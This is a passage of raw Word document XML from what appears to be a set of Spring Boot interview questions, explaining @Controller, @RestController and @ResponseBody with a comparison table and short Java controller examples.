    <w:p w14:paraId="4D3BA4CB"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hello";  // This will resolve to a view named 'hello.jsp' or 'hello.html'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042DEF65"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71459B87"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166C7FD5"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2. @RestController:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B70D689"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ed for</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: It is a specialized version of @Controller that is used for </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RESTful web services</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. It combines @Controller and @ResponseBody annotations, meaning that methods in @RestController will automatically serialize return values to the response body (typically JSON or XML).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E31C8A"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esponse Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you return data from a @RestController, it automatically returns the data in the response body (e.g., JSON or XML) without needing @ResponseBody explicitly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCA9AA6"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Typical Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used when you want to create REST APIs or web services that return data (JSON, XML) instead of views.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509B94D7"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA9E155"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stController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3662E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MyRestController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247E116A" w14:textId="77777777" w:rsidR="00C867C4" w:rsidRPr="00D774B4" w:rsidRDefault="00C867C4" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="136ED7E4"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questMapping("/hello")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5D0B24"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String hello() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7281183A"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Hello, World!";  // This will be automatically serialized to JSON or plain text.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8B5318"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44FF9A75"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1CD55312"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66"/>
        <w:gridCol w:w="4098"/>
        <w:gridCol w:w="3740"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="05BF4546" w14:textId="77777777" w:rsidTr="00C867C4">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EE0A7D7"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B93B5D3"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Controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CB34DDE"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RestController</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="72646D9C" w14:textId="77777777" w:rsidTr="00C867C4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15D13937"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urpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="168CC1F5"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For traditional web applications with views</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30F998B7"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For RESTful web services or APIs that return data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="3E9D3C40" w14:textId="77777777" w:rsidTr="00C867C4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11CDDE4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View Resolution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21D607B7"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turns a view name to be resolved by a view resolver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AF2C5DB"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turns data directly (no view resolution)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="447DF93C" w14:textId="77777777" w:rsidTr="00C867C4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="311D26FD"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Automatic @ResponseBody</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="466D732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No (you need to manually use @ResponseBody)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FE8792F"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Yes (it automatically applies @ResponseBody)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="25EC552F" w14:textId="77777777" w:rsidTr="00C867C4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FCF41B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lastRenderedPageBreak/>
              <w:t>Return Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D182DC5"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ypically a view (JSP, Thymeleaf)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63A0ABD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Data (JSON, XML, plain text)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="768CA0E5"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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C057392"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Controller</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used for web applications where you render views.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482F5D9D"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estController</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used for RESTful APIs that return data in response bodies, usually in formats like JSON or XML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5472D786" w14:textId="650EE521"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F060587">
          <v:rect id="_x0000_i2521" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3BB9FE" w14:textId="476EE0DE" w:rsidR="00D05936" w:rsidRPr="00CE4B95" w:rsidRDefault="00A0576F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="585" w:name="_Toc196308065"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use of @Responsebody annotation</w:t>
      </w:r>
      <w:r w:rsidR="00D05936" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="585"/>
    </w:p>
    <w:p w14:paraId="6EAF3712" w14:textId="1910EB76" w:rsidR="00C867C4" w:rsidRPr="00D774B4" w:rsidRDefault="00C867C4"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 @ResponseBody annotation in Spring is used to indicate that the return value of a method should be written directly to the HTTP response body, rather than being interpreted as a view name to be resolved by a view resolver. This is typically used in RESTful web services where the response is data (e.g., JSON, XML, plain text) rather than a view.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E09431"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Key Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA1EFF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ed with</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Typically used in controller methods to return raw data (like JSON or XML) directly to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7EF014"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esponse Type</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The return type is automatically serialized (using HttpMessageConverter) into the specified format, such as JSON or XML, based on the content type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCD0EF4"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No View Resolution</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It prevents Spring from trying to resolve the return value as a view and directly writes the response to the HTTP response body.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C35865"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 Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0922E58C"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stController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACCF0F2"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MyController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43443986" w14:textId="77777777" w:rsidR="00C867C4" w:rsidRPr="00D774B4" w:rsidRDefault="00C867C4" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B5F99B4"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questMapping("/user")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9867EF"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sponseBody</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD7F1A0"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User getUser() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395D4AA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User user = new User("John", "Doe");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B051BF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user;  // The User object will be automatically converted to JSON and returned in the response body</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0DC664"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1180BC0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12B92564"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Key Benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DC3B8D"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EST APIs</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It is primarily used in REST APIs where you want to send data (e.g., JSON) in the response instead of returning a view.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E58257"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Automatic Serialization</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spring automatically serializes Java objects to the appropriate format based on the Content-Type header (e.g., JSON for application/json).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C60F96"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In Combination with @RestController:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E50A804"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hen you use @RestController on a class, the @ResponseBody behavior is applied to all methods in that class automatically, meaning you don't need to annotate each method with @ResponseBody.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474A4F9C"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Example with @RestController:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DCE952"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stController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEF9382"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MyController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFA95DB" w14:textId="77777777" w:rsidR="00C867C4" w:rsidRPr="00D774B4" w:rsidRDefault="00C867C4" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A53ABC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questMapping("/user")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F2CEFD"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User getUser() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFB6886"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User user = new User("John", "Doe");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E5A16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user;  // Automatically serialized to JSON, no need for @ResponseBody</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126D4276"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049B672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58D05B04"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n summary, @ResponseBody is used to return data directly in the HTTP response body, particularly useful in RESTful services for sending JSON, XML, or plain text responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDFD6C4" w14:textId="232DEDDC"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C9CB739">
          <v:rect id="_x0000_i2522" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8306A8" w14:textId="7F084FE9" w:rsidR="00D05936" w:rsidRPr="00CE4B95" w:rsidRDefault="00E17679">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="586" w:name="_Toc196308066"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain @RestController annotation in Spring boot</w:t>
      </w:r>
      <w:r w:rsidR="00D05936" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="586"/>
    </w:p>
    <w:p w14:paraId="17834CDA" w14:textId="76712EA2" w:rsidR="00C867C4" w:rsidRPr="00D774B4" w:rsidRDefault="00C867C4"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The @RestController annotation in Spring Boot is a specialized version of the @Controller annotation used to define a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RESTful controller</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It is part of the Spring Web module and is used to create </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>REST APIs</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where methods return data (e.g., JSON, XML) instead of views.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23280E02"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Key Features:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AE1FCB"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lastRenderedPageBreak/>
        <w:t>Combination of @Controller and @ResponseBody:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D068A01" w14:textId="77777777" w:rsidR="00C867C4" w:rsidRPr="00D774B4" w:rsidRDefault="00C867C4"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RestController is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>composite annotation</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that combines @Controller and @ResponseBody.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE951B4" w14:textId="77777777" w:rsidR="00C867C4" w:rsidRPr="00D774B4" w:rsidRDefault="00C867C4"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t means that the methods in a @RestController will automatically have the behavior of @ResponseBody, which serializes the return value directly into the HTTP response body (usually as JSON or XML), bypassing view resolution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F064A5"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Automatic JSON/XML Conversion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C51EA54" w14:textId="77777777" w:rsidR="00C867C4" w:rsidRPr="00D774B4" w:rsidRDefault="00C867C4"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pring automatically converts the return value of a method (usually a POJO or DTO) into JSON or XML based on the request's Accept header or the content type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9770EF" w14:textId="77777777" w:rsidR="00C867C4" w:rsidRPr="00D774B4" w:rsidRDefault="00C867C4"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t uses HttpMessageConverter to serialize and deserialize objects to/from JSON or XML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D4413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Ideal for REST APIs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD5A966" w14:textId="77777777" w:rsidR="00C867C4" w:rsidRPr="00D774B4" w:rsidRDefault="00C867C4"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t is specifically designed for creating RESTful web services and APIs. This is in contrast to @Controller, which is typically used in traditional web applications where the controller returns views (like JSP or Thymeleaf templates).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D09B86"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEB4BFB"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stController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCEB007"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UserController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7743E032" w14:textId="77777777" w:rsidR="00C867C4" w:rsidRPr="00D774B4" w:rsidRDefault="00C867C4" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01FCCE56"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GetMapping("/user")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A846992"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User getUser() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D2E5F4"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new User("John", "Doe");  // Will be automatically converted to JSON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CC78F0"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44486AFA"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293CBFDB"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n the above example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A98EF88"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 getUser() method will return a User object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7829E60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 @RestController ensures that the return value is automatically serialized to JSON and sent in the response body.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A69BE01"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Key Benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AB202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Simplification</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You don't need to add @ResponseBody to every method since it's implied by @RestController.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FC5DE4"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Consistent for RESTful Services</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It is specifically tailored for building REST APIs, which makes it a clear choice for service-oriented applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAACDBD"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Automatic Response Serialization</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spring handles serialization and deserialization of Java objects into JSON (or XML) automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA3CAAA"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 of a REST API Controller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A2B11B"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stController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4171080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questMapping("/api")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284D459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ProductController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3772836C" w14:textId="77777777" w:rsidR="00C867C4" w:rsidRPr="00D774B4" w:rsidRDefault="00C867C4" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F28A578"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GetMapping("/products")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1560C144"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List&lt;Product&gt; getAllProducts() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE30AEC"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ist&lt;Product&gt; products = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1026C293"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oducts.add(new Product(1, "Laptop", 1000));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0335C7"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oducts.add(new Product(2, "Phone", 700));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2832EBDC"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products;  // Automatically converted to JSON and sent to the client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448F2539"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4293CE6E" w14:textId="77777777" w:rsidR="00C867C4" w:rsidRPr="00D774B4" w:rsidRDefault="00C867C4" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B6319D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ostMapping("/products")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E2482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Product createProduct(@RequestBody Product product) {</w:t>
      </w:r>
